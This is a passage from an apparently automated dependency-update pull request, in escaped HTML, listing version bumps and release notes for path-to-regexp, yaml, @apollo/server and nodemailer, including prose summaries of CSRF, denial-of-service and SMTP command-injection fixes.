regex prefixes (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/422\"\u003e#422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/48646547da685c1ccb76a95fe23373975a91e200\"\u003e\u003ccode\u003e4864654\u003c/code\u003e\u003c/a\u003e Restrict repeated wildcard backtracking (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/421\"\u003e#421\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/05a5a973702a863fb69415294503d13cb9d18b20\"\u003e\u003ccode\u003e05a5a97\u003c/code\u003e\u003c/a\u003e Remove dependabot config (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/404\"\u003e#404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/5b635cd1bd1d6d7ed6023d8834ae6e6a1e22461f\"\u003e\u003ccode\u003e5b635cd\u003c/code\u003e\u003c/a\u003e Remove \u003ccode\u003epackage-lock.json\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/407\"\u003e#407\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c4f5b3fc10782a5de2bee55c3e40e5af890c9cad\"\u003e\u003ccode\u003ec4f5b3f\u003c/code\u003e\u003c/a\u003e 8.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/6587c812746cba94855867612f3a719bb25f794e\"\u003e\u003ccode\u003e6587c81\u003c/code\u003e\u003c/a\u003e Move parameter name errors up in docs (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/402\"\u003e#402\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/9df2448fdfca9d2957cf47a1777b5deda9be18cf\"\u003e\u003ccode\u003e9df2448\u003c/code\u003e\u003c/a\u003e Remove more bytes from parser (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/401\"\u003e#401\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `yaml` from 1.10.2 to 1.10.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/cfe8f0437054ff5fbfe6499894f55b3316a54959\"\u003e\u003ccode\u003ecfe8f04\u003c/code\u003e\u003c/a\u003e 1.10.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/7abcf45dd63f0bc626890ad9a8cdeb397f92be73\"\u003e\u003ccode\u003e7abcf45\u003c/code\u003e\u003c/a\u003e fix: Catch stack overflow during CST composition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/a0252f8b056f49875d1b79edb8709cff7d7d0dc6\"\u003e\u003ccode\u003ea0252f8\u003c/code\u003e\u003c/a\u003e chore: Add rules avoiding processing of tests/json-test-suite\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/a5e83b05f7124c31b4784b613f0c669959a5ed48\"\u003e\u003ccode\u003ea5e83b0\u003c/code\u003e\u003c/a\u003e style: Apply updates Prettier rules\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/b8ddca0a5d4794a3c60f252d3513e6ff7068fdf0\"\u003e\u003ccode\u003eb8ddca0\u003c/code\u003e\u003c/a\u003e chore: Refresh lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/395f892ec9a26b9038c8db388b675c3281ab8cd3\"\u003e\u003ccode\u003e395f892\u003c/code\u003e\u003c/a\u003e ci: Use a different (working) submodule checkout\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/6fd272052751775e48196024d4bed639cc1e0350\"\u003e\u003ccode\u003e6fd2720\u003c/code\u003e\u003c/a\u003e test-events: Add {} and [] indicators to flow maps \u0026amp; sequences\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/eemeli/yaml/compare/v1.10.2...v1.10.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@apollo/server` from 4.13.0 to 5.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apollographql/apollo-server/releases\"\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003e@​apollo/server-integration-testsuite\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/apollographql/apollo-server/pull/8191\"\u003e#8191\u003c/a\u003e \u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003eApollo Server now rejects GraphQL \u003ccode\u003eGET\u003c/code\u003e requests which contain a \u003ccode\u003eContent-Type\u003c/code\u003e header other than \u003ccode\u003eapplication/json\u003c/code\u003e (with optional parameters such as \u003ccode\u003e; charset=utf-8\u003c/code\u003e). Any other value is now rejected with a 415 status code.\u003c/p\u003e\n\u003cp\u003e(GraphQL \u003ccode\u003eGET\u003c/code\u003e requests without a \u003ccode\u003eContent-Type\u003c/code\u003e header are still allowed, though they do still need to contain a non-empty \u003ccode\u003eX-Apollo-Operation-Name\u003c/code\u003e or \u003ccode\u003eApollo-Require-Preflight\u003c/code\u003e header to be processed if the default CSRF prevention feature is enabled.)\u003c/p\u003e\n\u003cp\u003eThis improvement makes Apollo Server's CSRF more resistant to browsers which implement CORS in non-spec-compliant ways. Apollo is aware of one browser which as of March 2026 has a bug which allows an attacker to circumvent Apollo Server's CSRF prevention feature to carry out read-only XS-Search-style CSRF attacks. The browser vendor is in the process of patching this vulnerability; upgrading Apollo Server to v5.5.0 mitigates this vulnerability.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eIf your server uses cookies (or HTTP Basic Auth) for authentication, Apollo encourages you to upgrade to v5.5.0.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThis is technically a backwards-incompatible change. Apollo is not aware of any GraphQL clients which provide non-empty \u003ccode\u003eContent-Type\u003c/code\u003e headers with \u003ccode\u003eGET\u003c/code\u003e requests with types other than \u003ccode\u003eapplication/json\u003c/code\u003e. If your use case requires such requests, please \u003ca href=\"https://github.com/apollographql/apollo-server/issues\"\u003efile an issue\u003c/a\u003e and we may add more configurability in a follow-up release.\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/apollographql/apollo-server/security/advisories/GHSA-9q82-xgwf-vj6h\"\u003eadvisory GHSA-9q82-xgwf-vj6h\u003c/a\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.5.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/apollographql/apollo-server/pull/8191\"\u003e#8191\u003c/a\u003e \u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/glasser\"\u003e\u003ccode\u003e@​glasser\u003c/code\u003e\u003c/a\u003e! - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003eApollo Server now rejects GraphQL \u003ccode\u003eGET\u003c/code\u003e requests which contain a \u003ccode\u003eContent-Type\u003c/code\u003e header other than \u003ccode\u003eapplication/json\u003c/code\u003e (with optional parameters such as \u003ccode\u003e; charset=utf-8\u003c/code\u003e). Any other value is now rejected with a 415 status code.\u003c/p\u003e\n\u003cp\u003e(GraphQL \u003ccode\u003eGET\u003c/code\u003e requests without a \u003ccode\u003eContent-Type\u003c/code\u003e header are still allowed, though they do still need to contain a non-empty \u003ccode\u003eX-Apollo-Operation-Name\u003c/code\u003e or \u003ccode\u003eApollo-Require-Preflight\u003c/code\u003e header to be processed if the default CSRF prevention feature is enabled.)\u003c/p\u003e\n\u003cp\u003eThis improvement makes Apollo Server's CSRF more resistant to browsers which implement CORS in non-spec-compliant ways. Apollo is aware of one browser which as of March 2026 has a bug which allows an attacker to circumvent Apollo Server's CSRF prevention feature to carry out read-only XS-Search-style CSRF attacks. The browser vendor is in the process of patching this vulnerability; upgrading Apollo Server to v5.5.0 mitigates this vulnerability.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eIf your server uses cookies (or HTTP Basic Auth) for authentication, Apollo encourages you to upgrade to v5.5.0.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThis is technically a backwards-incompatible change. Apollo is not aware of any GraphQL clients which provide non-empty \u003ccode\u003eContent-Type\u003c/code\u003e headers with \u003ccode\u003eGET\u003c/code\u003e requests with types other than \u003ccode\u003eapplication/json\u003c/code\u003e. If your use case requires such requests, please \u003ca href=\"https://github.com/apollographql/apollo-server/issues\"\u003efile an issue\u003c/a\u003e and we may add more configurability in a follow-up release.\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/apollographql/apollo-server/security/advisories/GHSA-9q82-xgwf-vj6h\"\u003eadvisory GHSA-9q82-xgwf-vj6h\u003c/a\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​apollo/server-integration-testsuite\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.4.0\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/apollographql/apollo-server/commit/d25a5bdc377826ad424fcf7f8d1d062055911643\"\u003e\u003ccode\u003ed25a5bd\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.4.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e\u003ca href=\"https://github.com/5\"\u003e\u003ccode\u003e@​5\u003c/code\u003e\u003c/a\u003e.4.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/d25a5bdc377826ad424fcf7f8d1d062055911643\"\u003e\u003ccode\u003ed25a5bd\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/phryneas\"\u003e\u003ccode\u003e@​phryneas\u003c/code\u003e\u003c/a\u003e! - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apollographql/apollo-server/blob/main/packages/server/CHANGELOG.md\"\u003e\u003ccode\u003e@​apollo/server\u003c/code\u003e's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/apollographql/apollo-server/pull/8191\"\u003e#8191\u003c/a\u003e \u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/glasser\"\u003e\u003ccode\u003e@​glasser\u003c/code\u003e\u003c/a\u003e! - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003eApollo Server now rejects GraphQL \u003ccode\u003eGET\u003c/code\u003e requests which contain a \u003ccode\u003eContent-Type\u003c/code\u003e header other than \u003ccode\u003eapplication/json\u003c/code\u003e (with optional parameters such as \u003ccode\u003e; charset=utf-8\u003c/code\u003e). Any other value is now rejected with a 415 status code.\u003c/p\u003e\n\u003cp\u003e(GraphQL \u003ccode\u003eGET\u003c/code\u003e requests without a \u003ccode\u003eContent-Type\u003c/code\u003e header are still allowed, though they do still need to contain a non-empty \u003ccode\u003eX-Apollo-Operation-Name\u003c/code\u003e or \u003ccode\u003eApollo-Require-Preflight\u003c/code\u003e header to be processed if the default CSRF prevention feature is enabled.)\u003c/p\u003e\n\u003cp\u003eThis improvement makes Apollo Server's CSRF more resistant to browsers which implement CORS in non-spec-compliant ways. Apollo is aware of one browser which as of March 2026 has a bug which allows an attacker to circumvent Apollo Server's CSRF prevention feature to carry out read-only XS-Search-style CSRF attacks. The browser vendor is in the process of patching this vulnerability; upgrading Apollo Server to v5.5.0 mitigates this vulnerability.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eIf your server uses cookies (or HTTP Basic Auth) for authentication, Apollo encourages you to upgrade to v5.5.0.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThis is technically a backwards-incompatible change. Apollo is not aware of any GraphQL clients which provide non-empty \u003ccode\u003eContent-Type\u003c/code\u003e headers with \u003ccode\u003eGET\u003c/code\u003e requests with types other than \u003ccode\u003eapplication/json\u003c/code\u003e. If your use case requires such requests, please \u003ca href=\"https://github.com/apollographql/apollo-server/issues\"\u003efile an issue\u003c/a\u003e and we may add more configurability in a follow-up release.\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/apollographql/apollo-server/security/advisories/GHSA-9q82-xgwf-vj6h\"\u003eadvisory GHSA-9q82-xgwf-vj6h\u003c/a\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.4.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/d25a5bdc377826ad424fcf7f8d1d062055911643\"\u003e\u003ccode\u003ed25a5bd\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/phryneas\"\u003e\u003ccode\u003e@​phryneas\u003c/code\u003e\u003c/a\u003e! - ⚠️ SECURITY \u003ccode\u003e@apollo/server/standalone\u003c/code\u003e:\u003c/p\u003e\n\u003cp\u003eThe default configuration of \u003ccode\u003estartStandaloneServer\u003c/code\u003e was vulnerable to denial of service (DoS) attacks through specially crafted request bodies with exotic character set encodings.\u003c/p\u003e\n\u003cp\u003eIn accordance with \u003ca href=\"https://datatracker.ietf.org/doc/html/rfc7159#section-8.1\"\u003eRFC 7159\u003c/a\u003e, we now only accept request bodies encoded in UTF-8, UTF-16 (LE or BE), or UTF-32 (LE or BE).\nAny other character set will be rejected with a \u003ccode\u003e415 Unsupported Media Type\u003c/code\u003e error.\nNote that the more recent JSON RFC, \u003ca href=\"https://datatracker.ietf.org/doc/html/rfc8259#section-8.1\"\u003eRFC 8259\u003c/a\u003e, is more strict and will only allow UTF-8.\nSince this is a minor release, we have chosen to remain compatible with the more permissive RFC 7159 for now.\nIn a future major release, we may tighten this restriction further to only allow UTF-8.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eIf you were not using \u003ccode\u003estartStandaloneServer\u003c/code\u003e, you were not affected by this vulnerability.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eGenerally, please note that we provide \u003ccode\u003estartStandaloneServer\u003c/code\u003e as a convenience tool for quickly getting started with Apollo Server.\nFor production deployments, we recommend using Apollo Server with a more fully-featured web server framework such as Express, Koa, or Fastify, where you have more control over security-related configuration options.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.3.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/apollographql/apollo-server/pull/8062\"\u003e#8062\u003c/a\u003e \u003ca href=\"https://github.com/apollographql/apollo-server/commit/8e54e5827791666e36082ad49d19c77f050355ac\"\u003e\u003ccode\u003e8e54e58\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/cristunaranjo\"\u003e\u003ccode\u003e@​cristunaranjo\u003c/code\u003e\u003c/a\u003e! - Allow configuration of graphql execution options (maxCoercionErrors)\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003econst server = new ApolloServer({\n  typeDefs,\n  resolvers,\n  executionOptions: {\n    maxCoercionErrors: 50,\n  },\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/64c0e1bb5d79d571bf448c35aea0b31097e6ce9d\"\u003e\u003ccode\u003e64c0e1b\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8192\"\u003e#8192\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/ada12001c4e95b5c779d80314a5a32e33087b5cf\"\u003e\u003ccode\u003eada1200\u003c/code\u003e\u003c/a\u003e Reject GET requests with a Content-Type other than application/json (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8191\"\u003e#8191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/ad45d1505d867de4c2761b7935855445ef7641e7\"\u003e\u003ccode\u003ead45d15\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8179\"\u003e#8179\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/d25a5bdc377826ad424fcf7f8d1d062055911643\"\u003e\u003ccode\u003ed25a5bd\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/443e54747d44c1d7c213d019936514dec024b450\"\u003e\u003ccode\u003e443e547\u003c/code\u003e\u003c/a\u003e fix repository urls\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/28d6d47ff636751807141267c329acb736c177b6\"\u003e\u003ccode\u003e28d6d47\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8172\"\u003e#8172\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/26320bccd77c6074d4a38119294f153f64e52d96\"\u003e\u003ccode\u003e26320bc\u003c/code\u003e\u003c/a\u003e feat: Allow configuration of graphql validation options \u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8014\"\u003e#8014\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/f2c16a7caff895a8b97c5a800405795cb19ba624\"\u003e\u003ccode\u003ef2c16a7\u003c/code\u003e\u003c/a\u003e bump dependency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/8e54e5827791666e36082ad49d19c77f050355ac\"\u003e\u003ccode\u003e8e54e58\u003c/code\u003e\u003c/a\u003e feat: Allow configuration of graphql execution options(maxCoercionErrors)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apollographql/apollo-server/commit/7be3686ae62fb04bb4d0bfddb465d5e89631d4e4\"\u003e\u003ccode\u003e7be3686\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/apollographql/apollo-server/tree/HEAD/packages/server/issues/8163\"\u003e#8163\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/apollographql/apollo-server/commits/@apollo/server@5.5.0/packages/server\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​apollo/server\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nodemailer` from 8.0.1 to 8.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodemailer/nodemailer/releases\"\u003enodemailer's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.3...v8.0.4\"\u003e8.0.4\u003c/a\u003e (2026-03-25)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esanitize envelope size to prevent SMTP command injection (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e2d7b971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.2...v8.0.3\"\u003e8.0.3\u003c/a\u003e (2026-03-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eclean up addressparser and fix group name fallback producing undefined (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/9d55877f8ed15a6aefd7ba76cbb6b6a6cdbcc4fd\"\u003e9d55877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix cookie bugs, remove dead code, and improve hot-path efficiency (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003ee8c8b92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erefactor smtp-connection for clarity and add Node.js 6 syntax compat test (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c5b48ea61c28eabf347972f4198a12cdab226ff7\"\u003ec5b48ea\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove familySupportCache that broke DNS resolution tests (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003ec803d90\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.2\"\u003e8.0.2\u003c/a\u003e (2026-03-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emerge fragmented display names with unquoted commas in addressparser (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/fe27f7fd57f7587d897274438da2f628ad0ad7d9\"\u003efe27f7f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodemailer/nodemailer/blob/master/CHANGELOG.md\"\u003enodemailer's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.3...v8.0.4\"\u003e8.0.4\u003c/a\u003e (2026-03-25)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esanitize envelope size to prevent SMTP command injection (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e2d7b971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.2...v8.0.3\"\u003e8.0.3\u003c/a\u003e (2026-03-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eclean up addressparser and fix group name fallback producing undefined (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/9d55877f8ed15a6aefd7ba76cbb6b6a6cdbcc4fd\"\u003e9d55877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix cookie bugs, remove dead code, and improve hot-path efficiency (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003ee8c8b92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erefactor smtp-connection for clarity and add Node.js 6 syntax compat test (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c5b48ea61c28eabf347972f4198a12cdab226ff7\"\u003ec5b48ea\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove familySupportCache that broke DNS resolution tests (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003ec803d90\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.2\"\u003e8.0.2\u003c/a\u003e (2026-03-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emerge fragmented display names with unquoted commas in addressparser (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/fe27f7fd57f7587d897274438da2f628ad0ad7d9\"\u003efe27f7f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d319753c34d2f0ced24d8eb1d7d866d965f59f4\"\u003e\u003ccode\u003e2d31975\u003c/code\u003e\u003c/a\u003e chore(master): release 8.0.4 (\u003ca href=\"https://redirect.github.com/nodemailer/nodemailer/issues/1806\"\u003e#1806\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e\u003ccode\u003e2d7b971\u003c/code\u003e\u003c/a\u003e fix: sanitize envelope size to prevent SMTP command injection\u003c/li\u003e\n\u003cli\u003e\u003ca 